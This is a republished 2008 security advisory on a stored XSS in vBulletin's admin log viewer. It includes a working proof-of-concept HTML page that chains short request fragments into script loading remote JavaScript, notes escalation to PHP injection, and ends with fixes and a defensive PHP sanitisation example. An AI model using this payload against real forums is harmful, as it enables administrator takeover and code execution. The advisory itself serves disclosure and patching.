XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower

2008.07.08
Credit: Jessica Hope
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

======================================================================
Advisory     : XSS in admin logs
Release Date : July 06th 2008
Application  : vBulletin
Version      : vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower
Platform     : PHP
Vendor URL   : http://www.vbulletin.com/
Authors      : Jessica Hope (jessicasaulhope_at_googlemail.com), Friends who wish to remain anonymous.
=======================================================================

Overview

Due to various failures in sanitising user input, it is possible to construct XSS attacks that are rather damaging.

=======================================================================

Discussion

The XSS in question exists on the log viewing page of the admin control panel. When a missing page is requested, a log entry is created in the admin area; however, the inputs to this log are not sanitised. The script name is taken from basename(PHP_SELF), while the action is taken from $_REQUEST['do']. Either one can be used to introduce XSS vectors.

To highlight the severity and underline the fact that this vulnerability is exploitable:

<html>
<body>
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<script '/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'/*" />
<!--edit to match your data -->
<img src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip'/*" />
<!-- end edit -->
<img src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>" />
</body>
</html>

You then need to send the admin to adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1 and the XSS will render.

The limits on the XSS:
  basename(PHP_SELF) is 50 characters max and no slashes
  $_REQUEST['do'] is limited to 20 characters, but has no character restriction

The tight character limits on the unsanitised parameters do not mitigate the severity, as unlimited attack space can be obtained as shown above.

As per my last exploits, all XSS in the vBulletin ACP can be used for PHP injection instantly. This is due to the design of the vBulletin hooks feature. As this particular XSS is persistent and will render in all major browsers, it is particularly dangerous.

=======================================================================

Solution:

Update to vBulletin 3.7.2 PL1 or vBulletin 3.6.10 PL3.
Don't trust PHP_SELF and sanitise all data that is going to be displayed to the user.
=======================================================================
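The two fixes the advisory recommends, as an added illustration that is not vBulletin's code: derive the logged script name from the executed file rather than PHP_SELF (which carries attacker-chosen PATH_INFO such as /admincp/faq.php/0), constrain the action value instead of relying on its 20-character cap, and HTML-encode everything at render time so a fragment like `*/a='document.wri'/*` is displayed as text. The function names and the sample request values are assumptions constructed for this example.

```php
<?php
// Added example, not vBulletin code. safe_script_name(), safe_action() and
// render_log_row() are hypothetical names; the request values are constructed.

// Use the filesystem path PHP actually executed, never PHP_SELF, and accept
// only a plain .php filename (the advisory notes the stored field is 50 chars).
function safe_script_name(string $script_filename): string
{
    $name = basename($script_filename);
    if (!preg_match('/^[a-z0-9_]{1,46}\.php$/', $name)) {
        return 'unknown';   // do not log an unexpected value verbatim
    }
    return $name;
}

// Real actions are short identifiers; a length cap alone is not a filter,
// as the advisory's chained 20-character fragments show.
function safe_action(?string $do): string
{
    if ($do === null || !preg_match('/^[a-z0-9_]{1,20}$/', $do)) {
        return 'invalid';
    }
    return $do;
}

// Output encoding in the viewer is the decisive fix: whatever reached the
// log table is rendered as text, never parsed as markup or script.
function render_log_row(array $row): string
{
    $script = htmlspecialchars($row['script'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $action = htmlspecialchars($row['action'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<tr><td>' . $script . '</td><td>' . $action . '</td></tr>';
}

// Constructed request resembling one step of the advisory's chain.
$_SERVER['SCRIPT_FILENAME'] = '/var/www/vB/upload/admincp/faq.php';
$_SERVER['PHP_SELF']        = '/admincp/faq.php/1';   // PATH_INFO attached
$_REQUEST['do']             = "*/a='document.wri'/*";

$row = [
    'script' => safe_script_name($_SERVER['SCRIPT_FILENAME']),  // "faq.php"
    'action' => safe_action($_REQUEST['do']),                   // "invalid"
];
echo render_log_row($row), "\n";

// Even a raw value already stored by a vulnerable version renders inert:
echo render_log_row(['script' => '0', 'action' => '<script>/*']), "\n";
```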

References:

http://www.vbulletin.com/forum/showthread.php?t=277945
http://www.securityfocus.com/bid/30134
http://www.securityfocus.com/archive/1/archive/1/494049/100/0/threaded
http://secunia.com/advisories/30991



Copyright 2024, cxsecurity.com
